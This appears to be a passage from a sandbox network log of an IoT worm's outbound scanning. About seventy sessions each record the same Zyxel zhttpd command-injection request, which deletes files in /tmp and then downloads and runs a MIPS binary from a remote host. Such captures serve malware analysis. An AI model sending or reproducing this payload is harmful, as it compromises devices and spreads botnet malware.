                              137192.168.2.134213057.166.18.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427412987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              138192.168.2.1345942222.100.61.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427486897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              139192.168.2.136010486.84.80.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427593946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              140192.168.2.1348696143.167.188.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427650928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              141192.168.2.134243053.53.19.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427695036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              142192.168.2.1349410117.69.207.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427767038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              143192.168.2.135686290.37.208.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427808046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              144192.168.2.1355460113.204.15.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427938938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              145192.168.2.135889842.54.170.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.427978992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              146192.168.2.1354242200.198.191.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428069115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              147192.168.2.13458509.42.230.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428152084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              148192.168.2.133370297.208.153.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428220987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              149192.168.2.1346718169.253.159.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428256035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              150192.168.2.1350636119.5.217.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428369045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              151192.168.2.1351032193.163.240.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428461075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              152192.168.2.134835470.201.150.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.428534985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              153192.168.2.1347958178.251.138.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393248081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              154192.168.2.1349104162.38.28.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393306017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              155192.168.2.1337732183.202.165.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393330097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              156192.168.2.1352320101.135.185.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393373966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              157192.168.2.1356120131.64.40.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393398046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              158192.168.2.1337258103.180.121.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393452883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              159192.168.2.1351118204.145.127.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393467903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              160192.168.2.135713281.237.44.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393491983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              161192.168.2.135796032.207.150.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393506050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              162192.168.2.1334782146.86.245.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393543005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              163192.168.2.1348438210.127.203.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393567085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              164192.168.2.133572074.85.108.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393611908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              165192.168.2.134274024.171.70.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393635035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              166192.168.2.1344662179.40.86.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393635035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              167192.168.2.1357016221.31.11.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393650055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              168192.168.2.134413865.47.47.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393701077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              169192.168.2.1354972170.17.205.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393734932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              170192.168.2.133638449.23.109.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393767118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              171192.168.2.1347604169.233.199.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393781900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              172192.168.2.1349546149.88.22.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393810034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              173192.168.2.133929439.246.33.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393852949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              174192.168.2.135860243.36.169.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393898964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              175192.168.2.135928423.6.202.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393929005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              176192.168.2.1347914132.28.21.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.393981934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              177192.168.2.1357326155.41.236.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.394016027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              178192.168.2.133333659.214.170.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.394049883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              179192.168.2.1348466194.240.232.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.394416094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              180192.168.2.1336734173.107.196.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:02.394484997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              181192.168.2.135299025.157.9.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479051113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              182192.168.2.135847279.117.211.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479104042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              183192.168.2.1341870122.215.81.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479166031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              184192.168.2.1345108177.72.174.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479260921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              185192.168.2.135320472.177.210.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479295015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              186192.168.2.133736823.131.76.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479305983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              187192.168.2.1337182159.236.232.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479335070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              188192.168.2.1333274106.184.211.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479386091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              189192.168.2.1340880138.45.102.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479439974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              190192.168.2.1340774165.230.26.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479494095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              191192.168.2.135434218.68.139.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479515076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              192192.168.2.1341788176.212.126.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479566097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              193192.168.2.1333974128.32.71.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479588985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              194192.168.2.1358674102.220.166.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479655027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              195192.168.2.1336972211.217.91.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479676008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              196192.168.2.1336636212.191.182.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479723930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              197192.168.2.1336682221.46.81.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479751110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              198192.168.2.13464302.179.3.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479832888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              199192.168.2.1338108114.0.141.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479866028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              200192.168.2.134119649.185.233.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479877949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              201192.168.2.134756452.203.84.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479943991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              202192.168.2.1359698146.93.97.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.479988098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              203192.168.2.1338950180.53.51.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480022907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              204192.168.2.1346106116.66.250.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480081081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              205192.168.2.1348122160.174.195.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480118990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              206192.168.2.1343524223.61.145.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:03.480158091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


